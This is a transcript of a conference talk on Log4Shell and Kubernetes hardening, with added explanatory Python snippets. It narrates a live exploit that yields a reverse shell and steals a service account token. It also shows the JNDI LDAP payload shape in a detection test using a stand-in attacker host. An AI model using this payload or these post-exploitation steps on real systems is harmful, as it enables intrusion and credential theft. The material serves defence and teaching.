I'm Eric Smalling. I'm a developer advocate at Snyk. And Alba? I'm Alba Ferry. I'm a senior product marketing manager at Sysdig. And we are here today to talk about vanquishing vulnerabilities here in Valencia. Yeah, not in "vulnerability." We're not in "vulnerability." Quick agenda: we don't have a lot of time, so hopefully I don't go too fast. First we'll quickly cover some terminology; I think everyone here knows most of it. Then I'm going to get right into a demonstration of a remote code execution. I'm going to demonstrate a Log4j (Log4Shell) exploit so that you can see, if you've not seen it before, how ridiculously easy it is to do. And then we're going to talk about some proactive measures you can use to minimize the blast radius for vulnerabilities like that, the ones you didn't see coming: zero days, or things that you don't know whether you have or not. And then Alba's going to talk about detecting that kind of behavior for anything that slips by, so that you can be alerted should something be happening in your cluster. So as I said, everybody in this room understands most of this terminology. The main one I'm going to talk about today, at least for my side of the talk, is mitigation: countermeasures you can use to prevent a threat, or at least reduce its impact on you in the real world. So enough talk and slides. Let's get to a demo. So what you're seeing here, let me set the scene. We have a J2EE application, two-tier. It's got a front end that's obviously Java and then a MySQL back end, running in separate pods on a Kubernetes cluster out in EKS. And please, conference Wi-Fi, stay working. Otherwise we'll have to drop to a recording and I hate doing that. So in the center here we have Octant running, just monitoring the logs of this Java application. And then on the left, you'll see what's going to happen over there in a minute. So I'm going to sign into my application.
And of course my 1Password has locked out. Here we go. This is un momento por favor. Clear my session out. Try that again. We're going to log in. Proof that I'm doing it live. So this, again, is just a simple application. If you've seen any of my talks before, you've probably seen this. It's just a to-do list. And if I search for something, like a "car" to-do, you'll see that it finds that and it shows the car. And if I come back over here and, again, live demos, let me refresh this page. Sometimes Octant loses its connection when Wi-Fi goes in and out. Oops. Ah, come on, Octant. There we go. Logs. OK, well, Octant's not going to cooperate with me. So we'll just open another terminal and do this the good old-fashioned way. Logs. Follow. java-goof. Come on, autocomplete. Remember what I said about conference Wi-Fi? There we go. Good grief. Not found. I must have bounced my pod since I did that last. There we go. There we go. Ignore the errors before that. Again, so we see that the search for "car" has happened. Ignore all this other stuff from the test runs I've done. But what we have here is that the application is very likely logging what we do as we go along. All of our applications do that. The interesting thing about the Log4j vulnerability, if you haven't looked into what it was and why it's so pernicious, is that it allowed a JNDI (Java Naming and Directory Interface) lookup using an external LDAP server. And what happens is you come in here, and I'm going to copy the string, because it's easier than typing it. It allows me to insert something here. And instead of a normal string to search for, I'm searching for an interpolated thing. Let me grow that font for you. I've got a dollar sign and a curly brace. And then I've got the protocol for LDAP. And I'm pointing to this LDAP server somewhere on a dark web domain, with a context of a remote shell. Now, before I start that, I'm going to go to this other tab over here.
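A note on the string described above: it has the shape `${jndi:ldap://host/context}`. As a minimal sketch, assuming you only want to illustrate what that shape looks like to a filter, the Python below flags the plain form of the lookup. The function name and the `attacker.example` host are hypothetical, and this is not a fix: obfuscated variants such as nested lookups get past a pattern like this, so patching Log4j remains the real remedy.

```python
import re

# Hypothetical helper for illustration only. It matches the plain
# "${jndi:" prefix, case-insensitively, and nothing more clever.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def looks_like_jndi_lookup(text: str) -> bool:
    """Return True if the text contains a plain Log4j-style JNDI lookup."""
    return JNDI_LOOKUP.search(text) is not None


if __name__ == "__main__":
    # An ordinary search term versus the interpolated form from the demo.
    for term in ["car", "${jndi:ldap://attacker.example/a}"]:
        print(term, "->", looks_like_jndi_lookup(term))
```

A check like this is at best a tripwire for logging or alerting; it says nothing about whether the application behind it is vulnerable.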
And this is just another instance running in EC2 somewhere. It doesn't matter where it is. I'm just listening with netcat on port 9000 in this case. Now, if I hit Go here, you see a connection. This happened. I do an ls. I now have a shell into the Tomcat server that is running that application. I can pull my environment, so I can see all sorts of nice information there, including the fact that I'm in a Kubernetes cluster, because of all the environment variables that fit that. There's all sorts of juicy information here I can get at. I can get at the internal IP of the API server for the control plane in this cluster. Let's see what else I can see. Let's do a df. Hey, it looks like, since this is pre-1.24 Kubernetes, the default service account token might be out there. So let's copy that and see if I can read that, /token. And there it is. So as a bad actor I can start expanding my exploit. Remote code execution exploits happen. You're going to have them occasionally. You need to stay patched. And it's obviously important to scan your code, scan your containers, and make sure that as vulnerabilities come up, you're patching them and getting them out of the way. But as happened to many companies with this exploit in December, they were caught off guard. It happened so fast, and so many people were vulnerable, that everyone was scrambling to figure out: do I have this problem? And what the heck do I do before I can get this patch out the door? So what are some of the other things I can do here? I could use that token to try going after the API, but who am I? Let's see what user I am. Oh, I'm root. That's handy. If you didn't know, many official open source images out on the main registries default to the root user in Docker containers. We'll get into why that's good or bad in a minute. Let's see. Can I touch a file in a directory and do an ls -ltr on /etc? Yes, I just created a foo.
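The checks run from the shell above (environment variables, the service account token, the current user) can also be turned around and used as a self-audit from inside your own pod. This is a minimal sketch under stated assumptions: `exposure_report` is a hypothetical helper, the token path is the conventional service account mount location, and `os.getuid` only exists on Unix-like systems.

```python
import os

# Conventional mount path for a pod's service account token.
TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"


def exposure_report(env, uid, token_exists, etc_writable):
    """Summarize what a shell inside this container would learn or be able to do."""
    return {
        "running_as_root": uid == 0,
        # Kubernetes injects this variable into pods by default.
        "in_kubernetes": "KUBERNETES_SERVICE_HOST" in env,
        "service_account_token_mounted": token_exists,
        "etc_writable": etc_writable,
    }


if __name__ == "__main__":
    report = exposure_report(
        env=os.environ,
        uid=os.getuid(),
        token_exists=os.path.exists(TOKEN_PATH),
        etc_writable=os.access("/etc", os.W_OK),
    )
    for check, result in report.items():
        print(f"{check}: {result}")
```

Passing the observations in as arguments keeps the function easy to exercise outside a cluster; every `True` in the report is something the mitigations later in the talk aim to turn into `False`.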
You can see that at the bottom of the screen. I created a foo file in the /etc directory. This tells me not only that, yes, I am root and I have the ability to do that, but also that it's a read-write file system in this container. So I can do things to it. Let's see if I can run nmap. Oops, if I can type. Oh, come on, Wi-Fi. So I have nmap available. That's cool. Let's see if I have curl available, just while I'm typing things. Let's do, I don't know, Google. That's always a good one to check. And yes, so I have curl at my disposal. I happen to have nmap on this box. This is because I was hacking on it earlier, honestly. That wasn't supposed to already be there. Let's pretend nmap wasn't there. I wonder if I can even just do this. Yes, so I have access to apt repositories, whether they be on the internet or some company-internal mirror. So I can start expanding my exploit very easily on this machine. So as I said, let's say you're at this company and you're freaking out now because this exploit has come out in December and you're trying to figure out what you need to do. Well, there are some mitigations you could have put in place ahead of time to minimize a lot of what I just showed you. First of all, the image I'm using, if I were to go look at the Dockerfile, is an official Tomcat image at version whatever. You would think that would have the JDK and the bits of the distribution, but it's also gonna have things like curl, as you saw. It's got Bash in there, it's got wget. It could even have Vim. Who knows what all is in this thing? It's a very fat container. And by being a fat container, you're giving a lot of tools to bad actors to use against you. What you really wanna do is try to stick to smaller image sizes to start with. You ideally just want the OpenJDK.
Now, maybe you wanna have a shell in there for things that you need to run as part of your startup or whatever, but minimize that image size so you're not providing tools to the bad actors. To do this, there are too many things to talk about in the short time we have today, but you can look at slim images. You could look at distroless images from the Google open source folks. Those are very minimal images. Just make sure they work for your team. You don't wanna go to distroless and then say, oh, I need this other tool, and then you've gotta build it from binary and include it yourself and become sysadmins as developers. That's not always the best solution, but find the right solution that minimizes the image size. Understand how layers work. If you're new to containers, you might think that you can just put in a RUN rm curl and get rid of that curl. That's not how it works. It just hides it in the image, and if somebody, like in yesterday's CTF demonstration, were to start up a privileged container, they can mount the host file system very easily and get at those hidden layers that are in the /var/run container, whatever, directories. I'm running out of time, so I'm gonna hurry up here. Practice good build strategies. If you're using Dockerfiles, use multi-stage builds so that your final stage can be as minimal as you can make it. In most places, you wanna have repeatable builds, so that every time you build from a given commit hash you get the same image out, so it's predictable and deterministic. And look at alternative tools. If you're a Java shop, I'm a big fan of Jib, which is a 100% Java-based image building tool that you can put right into your Maven or Gradle builds. If you're in Go, look at ko, K-O. There are a bunch of other tools you can standardize on to fit your organization's needs. And then finally, there are entire conferences dedicated to this now.
I can't go into secure supply chain in two seconds, but what I wanna mention here is that wherever your images are coming from, you wanna make sure you have an audit trail for them, a chain of custody if you will, and only automation should be putting those images into whatever managed registries you're using. An image from Eric's local docker build should never be shipped to anybody, anywhere that's important. Now let's talk about actual things you can do to minimize what I did there, beyond smaller images. Don't run as root in your containers. It's very, very rare, especially in business or e-commerce type applications, that you need a root user running your application. You might have something very specific, and that's a topic we can talk about at the booth later, but you probably don't need it, so switch to a lower-privileged user. When you're UID zero in a container, even though you're contained, you're UID zero, and if you can break out into the file system of the host, you can imagine what you can do. Privileged containers: as we saw yesterday, again in the CTF training, if you've got a privileged container you own the box. You have access to mount devices from the host, all sorts of stuff. Unless you're something like Falco that needs privileged access, you don't need privileged. Linux capabilities are the same kind of thing. Most business applications can safely drop all capabilities. Just add back the ones you need. If you can't run without NET_ADMIN for some reason, figure out why you need that, because that's kind of odd for a business app, but just add the capabilities you need. And then finally, the read-only root file system. Being immutable is a good thing in many ways. None of these are silver bullets, but it does make life harder for an attacker. I would not have been able to run apt-get update or install or any of those kinds of tools if I were trying to mutate a file system that's read-only from the beginning.
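The four container settings just listed (non-root user, no privileged mode, dropped capabilities, read-only root file system) map onto fields of a Kubernetes container `securityContext`. The sketch below is illustrative rather than taken from the talk: the field names are the real Kubernetes ones, while the helper names and the UID `10001` are assumptions.

```python
import json


def hardened_security_context(run_as_user=10001):
    """Build a container securityContext reflecting the advice above.

    The UID is an arbitrary non-zero example, not a recommended value.
    """
    return {
        "runAsNonRoot": True,
        "runAsUser": run_as_user,
        "privileged": False,
        "allowPrivilegeEscalation": False,
        "readOnlyRootFilesystem": True,
        # Drop everything, then add back only what the app needs.
        "capabilities": {"drop": ["ALL"]},
    }


def audit_security_context(ctx):
    """Return human-readable findings for settings that are missing or weak."""
    findings = []
    if not ctx.get("runAsNonRoot", False):
        findings.append("container may run as root")
    if ctx.get("privileged", False):
        findings.append("container is privileged")
    if "ALL" not in ctx.get("capabilities", {}).get("drop", []):
        findings.append("capabilities are not dropped")
    if not ctx.get("readOnlyRootFilesystem", False):
        findings.append("root filesystem is writable")
    return findings


if __name__ == "__main__":
    print(json.dumps(hardened_security_context(), indent=2))
    # An empty securityContext, which is what many manifests ship with.
    print(audit_security_context({}))
```

An application that writes to disk will need an explicit writable volume once the root file system is read-only, so a change like this should be tested per workload.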
But the big one I really wanna hit on is network policy. A lot of us in security discussions kind of ignore network policy. For developers like myself, the first time I looked at network policy I thought: I'm not a network admin, I don't understand how to do firewalls. It's not that hard. Network policy is one of my favorite tools, and for Log4j it's a great way to minimize the blast radius. The happy path of what should have been happening was: user hits web app, web app hits DB. That's the network path that should be happening. But what's really happening is that the web app is sending a connection out to an LDAP server, or a quasi-LDAP server, a faux one. That returns, and the app then calls another HTTP server that returns an evil object, which in turn calls back out to some port somewhere. In this case it was my other EC2 instance. Those orange connection lines should not be happening. Network policy allows you to specify ingress and egress rules for TCP and UDP across your deployment, and using selectors you can say which pods can and can't talk to each other. I'm a fan of the deny-all style pattern, where you start with nothing working. Everything is broken, obviously the app doesn't work here, but no ingress or egress from the pods is allowed. You wanna allow DNS so you have service discovery, but beyond that nothing is allowed. Then you explicitly add just the rules you need for your application to work. In this case I need traffic to come in from users, obviously, I need traffic to leave the web app towards the database, and I need traffic into the database only from the web app. If you wanna see what that would look like, if you're new to network policies, I have another tab somewhere. I have too many screens open. Actually, there's this one right here.
I'm not gonna go through the minutiae of the whole manifest here, but you can see I've broken this up fairly granularly to be legible. We have a deny-all policy with the empty pod selector, meaning all the pods in whatever namespace I deploy this to. Ingress and egress: for ingress, the empty list means no ingress to anything. For egress, the only egress you're allowed is to port 53. In the real world I'd be more specific than this and say you only get to kube-dns, but for this demo that's what I have. Then we wanna allow egress to the Java Goof web app, I'm sorry, ingress, only to port 8080. That's where my Tomcat server is listening. And then finally we wanna allow egress out of the Java web app to the Java DB. Now again, I could be more specific and say ports and whatnot. And then similarly, ingress into the Java DB from the Java web app. So let me quit out of that and do a k apply. k is aliased to kubectl because I'm lazy. I have no idea what my time is; hopefully I'm not eating all your time. In fact, I'm worried about time. If I apply that now, and go back over to my web app and just hit this again, what you're gonna see is that it's spinning now. That orange line coming out of this box here is now blocked. And for anybody attacking: yes, I'm still vulnerable, but I've mitigated and I've shrunk that blast radius. Now I've turned an RCE into a potential denial of service, maybe, if they machine-gun me right now and eat up a whole bunch of threads, but it's still better than somebody having a shell in my cluster. So simple things like that can be done to help mitigate these things. And finally, enforce the kinds of things I'm talking about with something like OPA Gatekeeper or Kyverno; Pod Security Admission is the new one coming in the next release. If you're using PSPs, that's great, but they're deprecated, so move to one of these. And with that I am going to hand over to Alba, because we're running out of time. Thank you.
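The manifest itself is not captured in the transcript, so the following is a reconstruction of the four policies as described, not the speaker's actual file. It is a minimal sketch that builds them as Python dictionaries and prints them as a JSON `List`, which could then be fed to `kubectl apply -f -`. The policy names and the `app: java-goof` and `app: java-goof-db` labels are assumptions.

```python
import json

WEB = {"app": "java-goof"}      # hypothetical label on the web app pods
DB = {"app": "java-goof-db"}    # hypothetical label on the database pods


def policy(name, spec):
    """Wrap a spec in the standard NetworkPolicy envelope."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": name},
        "spec": spec,
    }


def build_policies():
    return [
        # Deny all ingress for every pod; allow egress only to port 53 for DNS.
        policy("default-deny", {
            "podSelector": {},
            "policyTypes": ["Ingress", "Egress"],
            "ingress": [],
            "egress": [{"ports": [{"protocol": "UDP", "port": 53},
                                  {"protocol": "TCP", "port": 53}]}],
        }),
        # Users may reach the web app, but only on the Tomcat port.
        policy("allow-web-ingress", {
            "podSelector": {"matchLabels": WEB},
            "policyTypes": ["Ingress"],
            "ingress": [{"ports": [{"protocol": "TCP", "port": 8080}]}],
        }),
        # The web app may talk out to the database pods and nothing else.
        policy("allow-web-to-db", {
            "podSelector": {"matchLabels": WEB},
            "policyTypes": ["Egress"],
            "egress": [{"to": [{"podSelector": {"matchLabels": DB}}]}],
        }),
        # The database accepts traffic only from the web app pods.
        policy("allow-db-from-web", {
            "podSelector": {"matchLabels": DB},
            "policyTypes": ["Ingress"],
            "ingress": [{"from": [{"podSelector": {"matchLabels": WEB}}]}],
        }),
    ]


if __name__ == "__main__":
    manifest = {"apiVersion": "v1", "kind": "List", "items": build_policies()}
    print(json.dumps(manifest, indent=2))
```

Because network policies are additive, the deny-all policy sets the baseline and each later policy opens exactly one path. As noted in the talk, a real deployment would tighten the DNS rule to the cluster DNS pods and pin the database port.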
Okay, so with the time that I have left I'm going to be talking, can you hear me fine? Is it working? I'm going to be talking about detecting errant behavior. All those security controls and best practices that Eric walked us through are super valuable when we want to minimize the blast radius, when we want to protect our applications. Dev teams should really pay attention to all of this advice when they are building applications: not running containers as root if you can, dropping capabilities, not leaving network tools around that hackers can use in case they break in, and also using an admission controller as a last frontier before sending applications to production. Many of those apply better in the development phases of the application lifecycle. That is what is known in the field as shifting security left. But to detect errant behavior we want to look at the other side of the infinite loop. We want to look at production environments. Here is where we want to detect errant behavior, when we have our workloads running in production. Before we knew the Log4j library had such a big vulnerability, or even the most recent one, Spring4Shell, we didn't know our applications were at risk, right? Well, actually, many of the applications running in production environments right now are affected by vulnerabilities that are still hidden or haven't been detected yet, right? So how can we be sure that we are protected? How can we shift right? We said in the beginning, when we were going through the terminology, that a threat is a path, a theoretical path, a way that a vulnerability is exploited. And we showed in the demo how to exploit the Log4j vulnerability. So it became a real threat, right? We saw processes opening a reverse shell in a container and using network tools like nmap. Well, in this case it wasn't supposed to be there, but nmap and curl, whatever. We saw processes writing below sensitive folders, and even access to the package repositories, right?
So we need to find ways to detect this suspicious activity; that's how we can find out that we are being attacked, right? So in order to shift right, to protect our environment, we need to be very aware of this errant behavior. But we also need to know what the normal behavior of our workloads is, right? And when we think about containerized applications, well, we add a layer of abstraction, maybe two or three layers if you're using Kubernetes, right? That's why they are so easy to use. At the same time, we have caveats: that limited visibility doesn't let us see through them as well as we could on a normal host, right? So if we know what the normal conditions of our workloads are, we can be alerted when their behavior deviates from what is normal. For that you can use a threat detection engine like Falco, right? Falco is the first runtime security project that joined the CNCF as an incubation-level project. It works in a streaming fashion, you can use it as a kernel module or an eBPF program, and it is built on top of two open source libraries. Let's see if I can pronounce them. libscap, that's the easy one. And libsinsp. These libraries let you intercept all the activity happening in a host, and then, using rules and filters, you can send it to the rules engine, right? Because that is what we need. We need to be alerted as soon as suspicious activity happens in our production environment. We need this real-time detection, right? And Falco comes with a lot of default rules out of the box. Talking about the default rules, can I ask you, Eric, to pull up the messages that we had while doing the demo? We didn't tell you, but we had a Falco installation in the same cluster, so let's see if we find anything. It's gonna fail, so I'm just gonna pull up a recording of when we did this before so you can see it. So yeah, here we have the notice "known system binary sent network traffic," and that is from when we sent the JNDI string in the web search form, right?
And then I think we also had the "write below /etc" two or three lines below that, and also one from when we were accessing the package repository. So with just these out-of-the-box rules you can start detecting suspicious activity. I think we can go back to the slides. Okay, so yeah, but what happens if you want to detect suspicious activity that is not part of the activity happening in a host, right? Because in the end, vulnerability exploits can affect a wide range of targets, okay? So let's say you want to monitor config changes that could be suspicious in a cloud account, okay? That information is not in the syscalls. So to extend Falco's behavior, they released a very cool functionality called Falco plugins. Falco plugins are shared libraries that let us add different data sources and filter fields, so we can use the same Falco rules engine to detect suspicious activity happening in other environments, right? So let's say that a hacker finds your cloud credentials in a GitHub repo. I know this is very unlikely to happen, but let's pretend. With that information a lot of damage can be done, right? Or even better, let's say that a hacker exploits a vulnerability in your workloads. So it becomes a real threat again. And then, using lateral movement techniques, they jump to the cloud account. Having those credentials, they can spin up a new cluster, they can create additional users for later use, or they can even access sensitive information that you may be storing in your buckets. So these are also threats at runtime, right? I don't know if you remember the Okta breach that happened two months ago. For those of you who do not know, Okta is an identity provider; it is the one that saves us from having to log in every time we switch applications within our environment. Well, the community knew about Falco plugins, so they released a new plugin that consumes the Okta log events, so you can detect whether suspicious activity is going on.
So if you're an Okta user and you wonder whether your credentials were compromised, you can use the plugin to see if something weird is still going on in your account, right? And everyone can write their own plugin pretty easily. And then for my last slide I want to go back to the vulnerability topic. When I was presenting Falco I said that it's built on top of two open source libraries. Well, you can use those libraries as a baseline for very cool projects. If you want to know more about these projects, talk to me afterwards. But today I'm just bringing one of the possibilities, and it is using those libraries as a runtime intelligence data source. Runtime intelligence is a technique that brings intelligence, knowledge about the behavior of the software, of the workloads, at runtime, right? With that you can get information about the commands that are being used and the packages and libraries that are loaded in memory. So if you deal with the vulnerability nightmare, right, of having to fix vulnerabilities and prioritize different tasks, maybe it's a good idea to take this into consideration, because it will help you prioritize by risk and focus on just what you really need to fix, right? It can answer things like: of all the libraries that you have in an application, how many are really loaded in memory? Because in the end there are not as many as we think. And then, of the ones that are loaded in memory, how many have an actual exploit? Because sometimes CVEs are more like a theoretical threat, and in reality there's no exploit for them. So just focus on the ones that can really pose a risk to your workloads. And also, when we think about fixing vulnerabilities, what we need is a fix, a new package version, right?
So again, if that package that is loaded in memory and has an exploit doesn't have a fix, I'm not saying you should forget about it, but you can use that information to clear some of the noise in your super long list of vulnerabilities to fix. And with that I think we're done, and we made it. Okay, thank you very much. Were we fine on time? Yeah, this was a really nice talk. Any questions from the audience? I think we have time for maybe a couple of questions. Well, we will be at our booths throughout the week, right next to each other, Snyk and Sysdig. So come see us. Yeah, okay, yeah. Thank you. Thanks, Eric.
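The prioritization questions from the closing section (is the package loaded at runtime, is there a known exploit, is there a fix) can be written as a simple filter. This is a minimal sketch, assuming those three facts are already available per finding; the `Finding` class, the helper names, and the sample identifiers are all hypothetical and do not come from any particular tool.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    vuln_id: str             # placeholder identifier, not a real CVE
    package: str
    loaded_at_runtime: bool  # seen loaded in memory by runtime intelligence
    exploit_known: bool
    fix_available: bool


def fix_now(findings):
    """Loaded, exploitable, and fixable: the short list to act on first."""
    return [f for f in findings
            if f.loaded_at_runtime and f.exploit_known and f.fix_available]


def watch_list(findings):
    """Loaded and exploitable but with no fix yet: mitigate and keep watching."""
    return [f for f in findings
            if f.loaded_at_runtime and f.exploit_known and not f.fix_available]


SAMPLE = [
    Finding("EXAMPLE-0001", "lib-a", True, True, True),
    Finding("EXAMPLE-0002", "lib-b", False, True, True),
    Finding("EXAMPLE-0003", "lib-c", True, False, True),
    Finding("EXAMPLE-0004", "lib-d", True, True, False),
]

if __name__ == "__main__":
    print("fix now:", [f.vuln_id for f in fix_now(SAMPLE)])
    print("watch:  ", [f.vuln_id for f in watch_list(SAMPLE)])
```

The second bucket reflects the point that an unfixable finding is not forgotten, only moved out of the "patch today" queue, which is where mitigations such as network policy earn their keep.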